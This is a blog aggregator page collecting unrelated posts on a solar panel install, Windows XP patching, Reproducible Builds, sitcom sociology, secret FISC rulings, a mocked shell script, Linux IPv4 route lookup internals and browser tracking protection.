  • Replaced init.c with registration code inside of RcppExports.cpp thanks to Rcpp 0.12.11.

Changes in version 0.2.2 (2017-04-20)

  • Synchronized with upstream CCTZ

  • The time_point object is instantiated explicitly for nanosecond use which appears to be required on macOS

We also have a diff to the previous version thanks to CRANberries. More details are at the RcppCCTZ page; code, issue tickets etc at the GitHub repository.


,

Planet Debian: Joey Hess: DIY professional grade solar panel installation

I've installed 1 kilowatt of solar panels on my roof, using professional grade equipment. The four panels are Astronergy 260 watt panels, and they're mounted on IronRidge XR100 rails. Did it all myself, without help.

house with 4 solar panels on roof

I had three goals for this install:

  1. Cheap but sturdy. Total cost will be under $2500. It would probably cost at least twice as much to get a professional install, and the pros might not even want to do such a small install.
  2. Learn the roof mount system. I want to be able to add more panels, remove panels when working on the roof, and understand everything.
  3. Make every day a sunny day. With my current solar panels, I get around 10x as much power on a sunny day as a cloudy day, and I have plenty of power on sunny days. So 10x the PV capacity should be a good amount of power all the time.

My main concerns were whether I would be able to find the rafters when installing the rails, and whether the 5x3 foot panels would be too unwieldy to get up on the roof by myself.

I was able to find the rafters without needing a stud finder: removing the roof's vent caps exposed them. The shingles were on straight enough that I could follow the lines down and drill into the rafter on the first try every time. And I got the rails on, spaced well and straight, although I could have spaced the FlashFeet out better (oops).

My drill ran out of juice half-way, and I had to hack it to recharge on solar power, but that's another story. Between the learning curve, a lot of careful measurement, not the greatest shoes for roofing, and waiting for recharging, it took two days to get the 8 FlashFeet installed and the rails mounted.

Taking a break from that and swimming in the river, I realized I should have been wearing my water shoes on the roof all along. Super soft and nubbly, they make me feel like a gecko up there! After recovering from an (unrelated) achilles tendon strain, I got the panels installed today.

Turns out they're not hard to handle on the roof by myself. Getting them up a ladder to the roof by yourself would normally be another story, but my house has a 2 foot step up from the back retaining wall to the roof, and even has a handy grip beam as you step up.

roof next to the ground with a couple of cinderblock steps

The last gotcha, which I luckily anticipated, is that panels will slide down off the rails before you can get them bolted down. This is where a second pair of hands would have been most useful. But I MacGyvered a solution: temporary clamps, attached before bringing a panel up, stopped it from sliding down while I bolted it in place.

clamp temporarily attached to side of panel

I also finished the outside wiring today. Including the one hack of this install so far. Since the local hardware store didn't have a suitable conduit to bring the cables off the roof, I cobbled one together from pipe, with foam inserts to prevent chafing.

some pipe with 5 wires running through it, attached to the side of the roof

While I have 1 kilowatt of power on my roof now, I won't be able to use it until next week. After ordering the upgrade, I realized that my old PWM charge controller would be able to handle less than half the power, and to get even that I would have needed to mount the fuse box near the top of the roof and run down a large and expensive low-voltage high-amperage cable, around 00 AWG size. Instead, I'll be upgrading to an MPPT controller, and running a single 150 volt cable to it.

Then, since the MPPT controller can only handle 1 kilowatt when it's converting to 24 volts, not 12 volts, I'm gonna have to convert the entire house over from 12V DC to 24V DC, including changing all the light fixtures and rewiring the battery bank...
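The cable-sizing trade-off above follows directly from I = P / V: for a fixed power, higher system voltage means lower current and thus thinner, cheaper wire. A quick back-of-the-envelope sketch (plain arithmetic using the 1 kW figure from this install; the gauge remarks are illustrative):

```python
# Current drawn by a 1 kW array at different system voltages (I = P / V).
# Higher voltage means lower current, and thus thinner, cheaper cable.
panel_watts = 1000

for volts in (12, 24, 150):
    amps = panel_watts / volts
    print(f"{panel_watts} W at {volts} V -> {amps:.1f} A")

# At 12 V the cable must carry over 83 A (hence very thick, ~00 AWG wire);
# at 150 V it carries under 7 A, so a single small-gauge cable suffices.
```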

Cryptogram: Is Continuing to Patch Windows XP a Mistake?

Last week, Microsoft issued a security patch for Windows XP, a 16-year-old operating system that Microsoft officially no longer supports. Last month, Microsoft issued a Windows XP patch for the vulnerability used in WannaCry.

Is this a good idea? This 2014 essay argues that it's not:

The zero-day flaw and its exploitation is unfortunate, and Microsoft is likely smarting from government calls for people to stop using Internet Explorer. The company had three ways it could respond. It could have done nothing­ -- stuck to its guns, maintained that the end of support means the end of support, and encouraged people to move to a different platform. It could also have relented entirely, extended Windows XP's support life cycle for another few years and waited for attrition to shrink Windows XP's userbase to irrelevant levels. Or it could have claimed that this case is somehow "special," releasing a patch while still claiming that Windows XP isn't supported.

None of these options is perfect. A hard-line approach to the end-of-life means that there are people being exploited that Microsoft refuses to help. A complete about-turn means that Windows XP will take even longer to flush out of the market, making it a continued headache for developers and administrators alike.

But the option Microsoft took is the worst of all worlds. It undermines efforts by IT staff to ditch the ancient operating system and undermines Microsoft's assertion that Windows XP isn't supported, while doing nothing to meaningfully improve the security of Windows XP users. The upside? It buys those users at best a few extra days of improved security. It's hard to say how that was possibly worth it.

This is a hard trade-off, and it's going to get much worse with the Internet of Things. Here's me:

The security of our computers and phones also comes from the fact that we replace them regularly. We buy new laptops every few years. We get new phones even more frequently. This isn't true for all of the embedded IoT systems. They last for years, even decades. We might buy a new DVR every five or ten years. We replace our refrigerator every 25 years. We replace our thermostat approximately never. Already the banking industry is dealing with the security problems of Windows 95 embedded in ATMs. This same problem is going to occur all over the Internet of Things.

At least Microsoft has security engineers on staff that can write a patch for Windows XP. There will be no one able to write patches for your 16-year-old thermostat and refrigerator, even assuming those devices can accept security patches.

Planet Debian: Reproducible builds folks: Reproducible Builds: week 112 in Stretch cycle

Here's what happened in the Reproducible Builds effort between Sunday June 11 and Saturday June 17 2017:

Upcoming events

Upstream patches and bugs filed

Reviews of unreproducible packages

1 package review has been added, 19 have been updated and 2 have been removed this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (1)
  • Edmund Grimley Evans (1)

diffoscope development

tests.reproducible-builds.org

As you might have noticed, Debian stretch was released last week. Since then, Mattia and Holger renamed our testing suite to stretch and added a buster suite so that we keep our historic results for stretch visible and can continue our development work as usual. In this sense, happy hacking on buster; may it become the best Debian release ever and hopefully the first reproducible one!

  • Vagrant Cascadian:
  • Valerie Young: Add highlighting in navigation for the new nodes health pages.
  • Mattia Rizzolo:
    • Do not dump database ACL in the backups.
    • Deduplicate SSLCertificateFile directive into the common-directives-ssl macro
    • Apache: t.r-b.o: redirect /testing/ to /stretch/
    • db: s/testing/stretch/g
    • Start adding code to test buster...
  • Holger Levsen:
    • Update README.infrastructure to explain who has root access where.
    • reproducible_nodes_info.sh: correctly recognize zero builds per day.
    • Add build nodes health overview page, then split it in three: health overview, daily munin graphs and weekly munin graphs.
    • reproducible_worker.sh: improve handling of systemctl timeouts.
    • reproducible_build_service: sleep less and thus restart failed workers sooner.
    • Replace ftp.(de|uk|us).debian.org with deb.debian.org everywhere.
    • Performance page: also show local problems with _build_service.sh (which are autofixed after a maximum of 133.7 minutes).
    • Rename nodes_info job to html_nodes_info.
    • Add new node health check jobs, split off from maintenance jobs, run every 15 minutes.
      • Add two new checks: 1) for a correct system date (2019 is incorrect atm, and we sometimes got that) and 2) for a writable /tmp (a read-only /tmp sometimes happens on borked armhf nodes).
    • Add jobs for testing buster.
    • s/testing/stretch/g in all the code.
    • Finish the code to deal with buster.
    • Teach jessie and Ubuntu 16.04 how to debootstrap buster.

Axel Beckert is currently in the process of setting up eight LeMaker HiKey960 boards. These boards were sponsored by Hewlett Packard Enterprise and will be hosted by the SOSETH students association at ETH Zurich. Thanks to everyone involved here and also thanks to Martin Michlmayr and Steve Geary who initiated getting these boards to us.

Misc.

This week's edition was written by Chris Lamb, Holger Levsen & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Sociological Images: On “voluntary conformism,” or how we use our freedom to fit in

Originally posted at Montclair Socioblog.

“Freedom of opinion does not exist in America,” said de Tocqueville nearly two centuries ago. He might have held the same view today.

But how could a society that so values freedom and individualism be so demanding of conformity?  I had blogged about this in 2010 with references to old sitcoms, but for my class this semester I needed something more recent. Besides, Cosby now carries too much other baggage. ABC’s “black-ish”* came to the rescue.

The idea I was offering in class was, first, that our most cherished American values can conflict with one another. For example, our desire for family-like community can clash with our value on independence and freedom. Second, the American solution to this conflict between individual and group is often what Claude Fischer calls “voluntarism.”  We have freedom – you can voluntarily choose which groups to belong to. But once you choose to be a member, you have to conform.  The book I had assigned my class (My Freshman Year by Rebekah Nathan*) uses the phrase “voluntary conformism.”

In a recent episode of “black-ish,” the oldest daughter, Zoey, must choose which college to go to. She has been accepted at NYU, Miami, Vanderbilt, and Southern Cal. She leans heavily towards NYU, but her family, especially her father Dre, want her to stay close to home. The conflict is between Family – family togetherness, community – and Independence. If Zoey goes to NYU, she’ll be off on her own; if she stays in LA, she’ll be just a short drive from her family. New York also suggests values on Achievement, Success, even Risk-taking (“If I can make it there” etc.)

Zoey decides on NYU, and her father immediately tries to undermine that choice, reminding her of how cold and dangerous it will be. It’s typical sitcom-dad buffoonery, and his childishness tips us off that this position, imposing his will, is the wrong one. Zoey, acting more mature, simply goes out and buys a bright red winter coat.

The argument for Independence, Individual Choice, and Success is most clearly expressed by Pops (Dre’s father, who lives with them), and it’s the turning point in the show. Dre and his wife are complaining about the kids growing up too fast. Pops says, “Isn’t this what you wanted? Isn’t this why you both worked so hard — movin’ to this White-ass neighborhood, sendin’ her to that White-ass school so she could have all these White-ass opportunities? Let. Her. Go.”

That should be the end of it. The final scene should be the family bidding a tearful goodbye to Zoey at LAX. But a few moments later, we see Zoey talking to her two younger siblings (8-year old twins – Jack and Diane). They remind her of how much family fun they have at holidays. Zoey has to tell them that New York is far, so she won’t be coming back till Christmas – no Thanksgiving, no Halloween.

Jack reminds her about the baby that will arrive soon. “He won’t even know you.”

In the next scene, Zoey walks into her parents room carrying the red winter coat. “I need to return this.”

“Wrong size?” asks her father.

“Wrong state.”

She’s going to stay in LA and go to USC.

Over a half-century ago, David McClelland wrote that a basic but unstated tenet of American culture is: “I want to freely choose to do what others expect me to do.” Zoey has chosen to do what others want her to do – but she has made that individual choice independently. It’s “voluntary conformism,” and it’s the perfect American solution (or at least the perfect American sitcom solution).

* For those totally unfamiliar with the show, the premise is this: Dre Johnson, a Black man who grew up in a working-class Black neighborhood of LA, has become a well-off advertising man, married a doctor (her name is Rainbow, or usually Bow), and moved to a big house in an upscale neighborhood. They have four children, and the wife is pregnant with a fifth.

Jay Livingston is the chair of the Sociology Department at Montclair State University. You can follow him at Montclair SocioBlog or on Twitter.

(View original at https://thesocietypages.org/socimages)

Cryptogram: The Dangers of Secret Law

Last week, the Department of Justice released 18 new FISC opinions related to Section 702 as part of an EFF FOIA lawsuit. (Of course, they don't mention EFF or the lawsuit. They make it sound as if it was their idea.)

There's probably a lot in these opinions. In one Kafkaesque ruling, a defendant was denied access to the previous court rulings that were used by the court to decide against it:

...in 2014, the Foreign Intelligence Surveillance Court (FISC) rejected a service provider's request to obtain other FISC opinions that government attorneys had cited and relied on in court filings seeking to compel the provider's cooperation.

[...]

The provider's request came up amid legal briefing by both it and the DOJ concerning its challenge to a 702 order. After the DOJ cited two earlier FISC opinions that were not public at the time -- one from 2014 and another from 2008­ -- the provider asked the court for access to those rulings.

The provider argued that without being able to review the previous FISC rulings, it could not fully understand the court's earlier decisions, much less effectively respond to DOJ's argument. The provider also argued that because attorneys with Top Secret security clearances represented it, they could review the rulings without posing a risk to national security.

The court disagreed in several respects. It found that the court's rules and Section 702 prohibited the documents release. It also rejected the provider's claim that the Constitution's Due Process Clause entitled it to the documents.

This kind of government secrecy is toxic to democracy. National security is important, but we will not survive if we become a country of secret court orders based on secret interpretations of secret law.

Worse Than Failure: CodeSOD: A Lazy Cat

The innermost circle of Hell, as we all know, is trying to resolve printer driver issues for all eternity. Ben doesn’t work with the printers that we mere mortals deal with on a regular basis, though. He runs a printing press, three stories of spinning steel and plates and ink and rolls of paper that could crush a man.

Like most things, the press runs Linux- a highly customized, modified version of Linux. It’s a system that needs to be carefully configured, as “disaster recovery” has a slightly different meaning on this kind of heavy equipment. The documentation, while thorough and mostly clear, was obviously prepared by someone who speaks English as a second language. Thus, Ben wanted to check the shell scripts to better understand what they did.

The first thing he caught was that each script started with variable declarations like this:

GREP="/bin/grep"
CAT="/bin/cat"

In some cases, there were hundreds of such variable declarations because, presumably, someone doesn’t trust the PATH variable.

Now, it’s funny we bring up cat, as a common need in these scripts is to send a file to STDOUT. You’d think that cat is just the tool for the job, but you’d be mistaken. You need a shell function called cat_file:

# function send an file to STDOUT
#
# Usage: cat_file <Filename>
#

function cat_file ()
{
        local temp
        local error
        error=0
        if [ $# -ne 1 ]; then
                temp=""
                error=1
        else
                if [ -e ${1} ]; then
                        temp="`${CAT} ${1}`"
                else
                        temp=""
                        error=1
                fi
        fi
        echo "${temp}"
        return $((error))
}

This ‘belt and suspenders’ around cat ensures that you called it with parameters, that the parameters exist, and failing that, it… well… fails. Much like cat would, naturally. This gives you the great advantage, however, that instead of writing code like this:

dev="`cat /proc/dev/net | grep eth`"

You can instead write code like this:

dev="`cat_file /proc/dev/net | ${GREP} eth`"

Much better, yes?


Planet Debian: Vincent Bernat: IPv4 route lookup on Linux

TL;DR: With its implementation of IPv4 routing tables using LPC-tries, Linux offers good lookup performance (50 ns for a full view) and low memory usage (64 MiB for a full view).


During the lifetime of an IPv4 datagram inside the Linux kernel, one important step is the route lookup for the destination address through the fib_lookup() function. From essential information about the datagram (source and destination IP addresses, interfaces, firewall mark, …), this function should quickly provide a decision. Some possible options are:

  • local delivery (RTN_LOCAL),
  • forwarding to a supplied next hop (RTN_UNICAST),
  • silent discard (RTN_BLACKHOLE).

Since 2.6.39, Linux stores routes in a compressed prefix tree (commit 3630b7c050d9). In the past, a route cache was maintained, but it was removed in Linux 3.6.

Route lookup in a trie

Looking up a route in a routing table means finding the most specific prefix matching the requested destination. Let’s assume the following routing table:

$ ip route show scope global table 100
default via 203.0.113.5 dev out2
192.0.2.0/25
        nexthop via 203.0.113.7  dev out3 weight 1
        nexthop via 203.0.113.9  dev out4 weight 1
192.0.2.47 via 203.0.113.3 dev out1
192.0.2.48 via 203.0.113.3 dev out1
192.0.2.49 via 203.0.113.3 dev out1
192.0.2.50 via 203.0.113.3 dev out1

Here are some examples of lookups and the associated results:

Destination IP Next hop
192.0.2.49 203.0.113.3 via out1
192.0.2.50 203.0.113.3 via out1
192.0.2.51 203.0.113.7 via out3 or 203.0.113.9 via out4 (ECMP)
192.0.2.200 203.0.113.5 via out2

A common structure for route lookup is the trie, a tree structure where each node has its parent as prefix.

Lookup with a simple trie

The following trie encodes the previous routing table:

Simple routing trie

For each node, the prefix is known by its path from the root node and the prefix length is the current depth.

A lookup in such a trie is quite simple: at each step, fetch the nth bit of the IP address, where n is the current depth. If it is 0, continue with the first child. Otherwise, continue with the second. If a child is missing, backtrack until a routing entry is found. For example, when looking for 192.0.2.50, we will find the result in the corresponding leaf (at depth 32). However for 192.0.2.51, we will reach 192.0.2.50/31 but there is no second child. Therefore, we backtrack until the 192.0.2.0/25 routing entry.
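The lookup just described can be sketched in a few lines of Python. This is only an illustrative model of the algorithm (the kernel’s data structures are very different); the routes and next hops are taken from the example table above:

```python
# Toy model of a simple (uncompressed) binary routing trie.
# Backtracking is done by remembering the best entry seen on the way
# down, which is also how Linux avoids walking back up the tree.

def ip(s):
    a, b, c, d = map(int, s.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d

def insert(root, prefix, plen, nexthop):
    """Insert a route; prefix is a 32-bit integer, plen its length."""
    node = root
    for depth in range(plen):
        bit = (prefix >> (31 - depth)) & 1
        node = node.setdefault(bit, {})
    node["entry"] = nexthop

def lookup(root, addr):
    """Longest-prefix match for a 32-bit address."""
    node, best = root, root.get("entry")
    for depth in range(32):
        bit = (addr >> (31 - depth)) & 1
        if bit not in node:
            break                    # dead end: fall back to best match
        node = node[bit]
        if "entry" in node:
            best = node["entry"]     # most specific match so far
    return best

root = {}
insert(root, ip("0.0.0.0"), 0, "203.0.113.5 via out2")      # default
insert(root, ip("192.0.2.0"), 25, "ECMP via out3/out4")
insert(root, ip("192.0.2.50"), 32, "203.0.113.3 via out1")

print(lookup(root, ip("192.0.2.50")))   # exact /32 match
print(lookup(root, ip("192.0.2.51")))   # falls back to 192.0.2.0/25
print(lookup(root, ip("192.0.2.200")))  # falls back to the default route
```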

Adding and removing routes is quite easy. From a performance point of view, the lookup is done in constant time relative to the number of routes (since the maximum depth is capped at 32).

Quagga is an example of routing software still using this simple approach.

Lookup with a path-compressed trie

In the previous example, most nodes only have one child. This leads to a lot of unneeded bitwise comparisons and memory is also wasted on many nodes. To overcome this problem, we can use path compression: each node with only one child is removed (except if it also contains a routing entry). Each remaining node gets a new property telling how many input bits should be skipped. Such a trie is also known as a Patricia trie or a radix tree. Here is the path-compressed version of the previous trie:

Patricia trie

Since some bits have been ignored, on a match, a final check is executed to ensure all bits from the found entry are matching the input IP address. If not, we must act as if the entry wasn’t found (and backtrack to find a matching prefix). The following figure shows two IP addresses matching the same leaf:

Lookup in a Patricia trie

The reduction in the average depth of the tree compensates for the need to handle those false positives. Insertion and deletion of a routing entry is still easy enough.
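That final check can be sketched as follows; a minimal illustration (not kernel code) of why a candidate leaf must be verified against the full prefix:

```python
# After a path-compressed descent, only the non-skipped bits have been
# examined, so the leaf we reach is just a candidate: verify it.

def ip(s):
    a, b, c, d = map(int, s.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d

def matches(addr, prefix, plen):
    """True if the first plen bits of addr equal those of prefix."""
    if plen == 0:
        return True
    mask = (~((1 << (32 - plen)) - 1)) & 0xFFFFFFFF
    return (addr & mask) == (prefix & mask)

# Both addresses below can reach this leaf when the diverging bit was
# among the skipped ones; only the first is a genuine match.
leaf = (ip("192.0.2.50"), 32)

print(matches(ip("192.0.2.50"), *leaf))  # True
print(matches(ip("192.0.2.51"), *leaf))  # False: backtrack to a shorter prefix
```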

Many routing systems use Patricia trees.

Lookup with a level-compressed trie

In addition to path compression, level compression2 detects parts of the trie that are densely populated and replaces them with a single node and an associated vector of 2^k children. This node will handle k input bits instead of just one. For example, here is a level-compressed version of our previous trie:

Level-compressed trie

Such a trie is called an LC-trie or LPC-trie and offers higher lookup performance compared to a radix tree.

A heuristic is used to decide how many bits a node should handle. On Linux, if the ratio of non-empty children to all children would be above 50% when the node handles an additional bit, the node gets this additional bit. On the other hand, if the current ratio is below 25%, the node loses the responsibility of one bit. Those values are not tunable.
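The heuristic boils down to two small predicates; a sketch using the thresholds quoted above (the kernel’s actual bookkeeping of full and empty children on insert/delete is more involved):

```python
# Sketch of the LC-trie resize heuristic: inflate a node (give it one
# more bit) or halve it (take one bit away) based on child occupancy.

def should_inflate(nonempty_if_doubled, size_if_doubled):
    """Grant the node one more bit if the doubled child vector
    would still be more than 50% occupied."""
    return nonempty_if_doubled > size_if_doubled // 2

def should_halve(nonempty, size):
    """Take one bit away if fewer than 25% of the children are in use."""
    return nonempty < size // 4

# A node handling 2 bits has 4 children; doubling it to 8 slots would
# leave 5 of them non-empty: still above 50%, so the node gets a 3rd bit.
print(should_inflate(5, 8))   # True
# Only 1 of 8 children in use: below 25%, drop back to fewer bits.
print(should_halve(1, 8))     # True
```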

Insertion and deletion becomes more complex but lookup times are also improved.

Implementation in Linux

The implementation for IPv4 in Linux exists since 2.6.13 (commit 19baf839ff4a) and is enabled by default since 2.6.39 (commit 3630b7c050d9).

Here is the representation of our example routing table in memory3:

Memory representation of a trie

Several structures are involved.

The trie can be retrieved through /proc/net/fib_trie:

$ cat /proc/net/fib_trie
Id 100:
  +-- 0.0.0.0/0 2 0 2
     |-- 0.0.0.0
        /0 universe UNICAST
     +-- 192.0.2.0/26 2 0 1
        |-- 192.0.2.0
           /25 universe UNICAST
        |-- 192.0.2.47
           /32 universe UNICAST
        +-- 192.0.2.48/30 2 0 1
           |-- 192.0.2.48
              /32 universe UNICAST
           |-- 192.0.2.49
              /32 universe UNICAST
           |-- 192.0.2.50
              /32 universe UNICAST
[...]

For internal nodes, the numbers after the prefix are:

  1. the number of bits handled by the node,
  2. the number of full children (they only handle one bit),
  3. the number of empty children.
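As an illustration, those three fields can be picked apart with a short script (the regular expression is mine, matched against the sample output above):

```python
# Parse an internal-node ("+--") line from /proc/net/fib_trie into the
# three fields described above.

import re

def parse_tnode(line):
    m = re.match(r"\s*\+-- (\S+)/(\d+) (\d+) (\d+) (\d+)", line)
    prefix, plen, bits, full, empty = m.groups()
    return {"prefix": prefix, "plen": int(plen), "bits": int(bits),
            "full_children": int(full), "empty_children": int(empty)}

node = parse_tnode("        +-- 192.0.2.48/30 2 0 1")
print(node["bits"])            # 2: a vector of 2**2 = 4 children
print(node["empty_children"])  # 1: three leaves (.48, .49, .50), one hole
```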

Moreover, if the kernel was compiled with CONFIG_IP_FIB_TRIE_STATS, some interesting statistics are available in /proc/net/fib_triestat4:

$ cat /proc/net/fib_triestat
Basic info: size of leaf: 48 bytes, size of tnode: 40 bytes.
Id 100:
        Aver depth:     2.33
        Max depth:      3
        Leaves:         6
        Prefixes:       6
        Internal nodes: 3
          2: 3
        Pointers: 12
Null ptrs: 4
Total size: 1  kB
[...]

When a routing table is very dense, a node can handle many bits. For example, a densely populated routing table with 1 million entries packed in a /12 can have one internal node handling 20 bits. In this case, route lookup is essentially reduced to a lookup in a vector.

The following graph shows the number of internal nodes used relative to the number of routes for different scenarios (routes extracted from an Internet full view, /32 routes spread over 4 different subnets with various densities). When routes are densely packed, the number of internal nodes is quite limited.

Internal nodes and null pointers

Performance

So how performant is a route lookup? The maximum depth stays low (about 6 for a full view), so a lookup should be quite fast. With the help of a small kernel module, we can accurately benchmark5 the fib_lookup() function:

Maximum depth and lookup time

The lookup time is loosely tied to the maximum depth. When the routing table is densely populated, the maximum depth is low and the lookup times are fast.

When forwarding at 10 Gbps, the time budget for a packet would be about 50 ns. Since this is also the time needed for the route lookup alone in some cases, we wouldn’t be able to forward at line rate with only one core. Nonetheless, the results are pretty good and they are expected to scale linearly with the number of cores.
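The 50 ns budget follows from simple arithmetic; here is a quick back-of-the-envelope check, with my own assumptions (minimum-size 64-byte Ethernet frames, ignoring the preamble and the inter-frame gap), not necessarily the article’s exact methodology:

```python
# Back-of-the-envelope check of the per-packet time budget quoted above.

def budget_ns(frame_bytes, rate_gbps):
    """Time on the wire for one frame, in nanoseconds."""
    return frame_bytes * 8 / rate_gbps   # bits / (Gbit/s) = ns

print(budget_ns(64, 10))     # 51.2 ns: roughly the 50 ns budget above
print(budget_ns(1500, 10))   # 1200.0 ns for a full-size packet
```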

Another interesting figure is the time it takes to insert all those routes into the kernel. Linux is also quite efficient in this area since you can insert 2 million routes in less than 10 seconds:

Insertion time

Memory usage

The memory usage is available directly in /proc/net/fib_triestat. The statistic provided doesn’t account for the fib_info structures, but you should only have a handful of them (one for each possible next-hop). As you can see on the graph below, the memory use is linear with the number of routes inserted, regardless of the shape of the routes.

Memory usage

The results are quite good. With only 256 MiB, about 2 million routes can be stored!

Routing rules

Unless configured without CONFIG_IP_MULTIPLE_TABLES, Linux supports several routing tables and has a system of configurable rules to select the table to use. These rules can be configured with ip rule. By default, there are three of them:

$ ip rule show
0:      from all lookup local
32766:  from all lookup main
32767:  from all lookup default

Linux first looks for a match in the local table. If it doesn’t find one, it looks in the main table and, as a last resort, the default table.
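The rule walk can be modeled in a few lines of Python (an illustrative sketch, with table contents borrowed from the examples in this article, not how the kernel implements fib rules):

```python
# Toy model of the rule walk: rules are evaluated in priority order and
# the first table containing a matching route wins.

def ip(s):
    a, b, c, d = map(int, s.split("."))
    return (a << 24) | (b << 16) | (c << 8) | d

def match(addr, prefix):
    net, plen = prefix.split("/")
    plen = int(plen)
    mask = 0 if plen == 0 else (~((1 << (32 - plen)) - 1)) & 0xFFFFFFFF
    return (addr & mask) == (ip(net) & mask)

rules = [(0, "local"), (32766, "main"), (32767, "default")]
tables = {
    "local":   {"192.168.117.55/32": "local delivery"},
    "main":    {"0.0.0.0/0": "via 192.168.117.1 dev eno1"},
    "default": {},
}

def lookup(addr):
    for _priority, name in rules:
        best = None                   # longest-prefix match in this table
        for prefix, route in tables[name].items():
            plen = int(prefix.split("/")[1])
            if match(addr, prefix) and (best is None or plen > best[0]):
                best = (plen, route)
        if best is not None:
            return best[1]            # first table with a match wins
    return "unreachable"

print(lookup(ip("192.168.117.55")))  # found in the local table
print(lookup(ip("8.8.8.8")))         # falls through to main's default
```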

Builtin tables

The local table contains routes for local delivery:

$ ip route show table local
broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1
local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1
local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1
broadcast 192.168.117.0 dev eno1 proto kernel scope link src 192.168.117.55
local 192.168.117.55 dev eno1 proto kernel scope host src 192.168.117.55
broadcast 192.168.117.63 dev eno1 proto kernel scope link src 192.168.117.55

This table is populated automatically by the kernel when addresses are configured. Let’s look at the last three lines. When the IP address 192.168.117.55 was configured on the eno1 interface, the kernel automatically added the appropriate routes:

  • a route for 192.168.117.55 for local unicast delivery to the IP address,
  • a route for 192.168.117.63 for broadcast delivery to the broadcast address,
  • a route for 192.168.117.0 for broadcast delivery to the network address.

When 127.0.0.1 was configured on the loopback interface, the same kind of routes were added to the local table. However, a loopback address receives special treatment and the kernel also adds the whole subnet to the local table. As a result, you can ping any IP in 127.0.0.0/8:

$ ping -c1 127.42.42.42
PING 127.42.42.42 (127.42.42.42) 56(84) bytes of data.
64 bytes from 127.42.42.42: icmp_seq=1 ttl=64 time=0.039 ms

--- 127.42.42.42 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.039/0.039/0.039/0.000 ms

The main table usually contains all the other routes:

$ ip route show table main
default via 192.168.117.1 dev eno1 proto static metric 100
192.168.117.0/26 dev eno1 proto kernel scope link src 192.168.117.55 metric 100

The default route has been configured by some DHCP daemon. The connected route (scope link) has been automatically added by the kernel (proto kernel) when configuring an IP address on the eno1 interface.

The default table is empty and has little use. It was kept when the current incarnation of advanced routing was introduced in Linux 2.1.68, after a first attempt using “classes” in Linux 2.1.156.

Performance

Since Linux 4.1 (commit 0ddcf43d5d4a), when the set of rules is left unmodified, the main and local tables are merged and the lookup is done with this single table (and the default table if not empty). Without specific rules, there is no performance hit when enabling the support for multiple routing tables. However, as soon as you add new rules, some CPU cycles will be spent for each datagram to evaluate them. Here are a couple of graphs demonstrating the impact of routing rules on lookup times:

Routing rules impact on performance

For some reason, the relation is linear when the number of rules is between 1 and 100 but the slope increases noticeably past this threshold. The second graph highlights the negative impact of the first rule (about 30 ns).

A common use of rules is to create virtual routers: interfaces are segregated into domains and when a datagram enters through an interface from domain A, it should use routing table A:

# ip rule add iif vlan457 table 10
# ip rule add iif vlan457 blackhole
# ip rule add iif vlan458 table 20
# ip rule add iif vlan458 blackhole

The blackhole rules may be removed if you are sure there is a default route in each routing table. For example, we add a blackhole default route with a high metric so it does not override a regular default route:

# ip route add blackhole default metric 9999 table 10
# ip route add blackhole default metric 9999 table 20
# ip rule add iif vlan457 table 10
# ip rule add iif vlan458 table 20

To reduce the impact on performance when many interface-specific rules are used, interfaces can be attached to VRF instances and a single rule can be used to select the appropriate table:

# ip link add vrf-A type vrf table 10
# ip link set dev vrf-A up
# ip link add vrf-B type vrf table 20
# ip link set dev vrf-B up
# ip link set dev vlan457 master vrf-A
# ip link set dev vlan458 master vrf-B
# ip rule show
0:      from all lookup local
1000:   from all lookup [l3mdev-table]
32766:  from all lookup main
32767:  from all lookup default

The special l3mdev-table rule was automatically added when configuring the first VRF interface. This rule will select the routing table associated with the VRF owning the input (or output) interface.

VRF was introduced in Linux 4.3 (commit 193125dbd8eb), the performance was greatly enhanced in Linux 4.8 (commit 7889681f4a6c) and the special routing rule was also introduced in Linux 4.8 (commit 96c63fa7393d, commit 1aa6c4f6b8cd). You can find more details about it in the kernel documentation.

Conclusion

The takeaways from this article are:

  • route lookup times hardly increase with the number of routes,
  • densely packed /32 routes lead to amazingly fast route lookups,
  • memory use is low (128 MiB per million routes),
  • no optimization is done on routing rules.

  1. The routing cache was subject to denial-of-service attacks that were reasonably easy to launch. It was also believed not to be efficient for high volume sites like Google, but I have first-hand experience that it was not the case for moderately high volume sites. 

  2. “IP-address lookup using LC-tries”, IEEE Journal on Selected Areas in Communications, 17(6):1083-1092, June 1999. 

  3. For internal nodes, the key_vector structure is embedded into a tnode structure. This structure contains information rarely used during lookup, notably the reference to the parent that is usually not needed for backtracking as Linux keeps the nearest candidate in a variable. 

  4. One leaf can contain several routes (struct fib_alias is a list). The number of “prefixes” can therefore be greater than the number of leaves. The system also keeps statistics about the distribution of the internal nodes relative to the number of bits they handle. In our example, all three internal nodes are handling 2 bits. 

  5. The measurements are done in a virtual machine with one vCPU. The host is an Intel Core i5-4670K running at 3.7 GHz during the experiment (CPU governor was set to performance). The kernel is Linux 4.11. The benchmark is single-threaded. It runs a warm-up phase, then executes about 100,000 timed iterations and keeps the median. Timings of individual runs are computed from the TSC.

  6. Fun fact: the documentation of this first attempt at more flexible routing is still available in today’s kernel tree and explains the usage of the “default class”.

Don MartiCatching up to Safari?

Earlier this month, Apple Safari pulled ahead of other mainstream browsers in tracking protection. Tracking protection in the browser is no longer a question of should the browser do it, but which browser best protects its users. But Apple's early lead doesn't mean that another browser can't catch up.

Tracking protection is still hard. You have to provide good protection from third-party tracking, which users generally don't want, without breaking legit third-party services such as content delivery networks, single sign-on systems, and shopping carts. Protection is a balance, similar to the problem of filtering spam while delivering legit mail. Just as spam filtering helps enable legit email marketing, tracking protection tends to enable legit advertising that supports journalism and cultural works.

In the long run, just as we have seen with spam filters, it will be more important to make protection hard to predict than to run the perfect protection out of the box. A spam filter, or browser, that always does the same thing will be analyzed and worked around. A mail service that changes policies to respond to current spam runs, or an unpredictable ecosystem of tracking protection add-ons that browser users can install in unpredictable combinations, is likely to be harder.

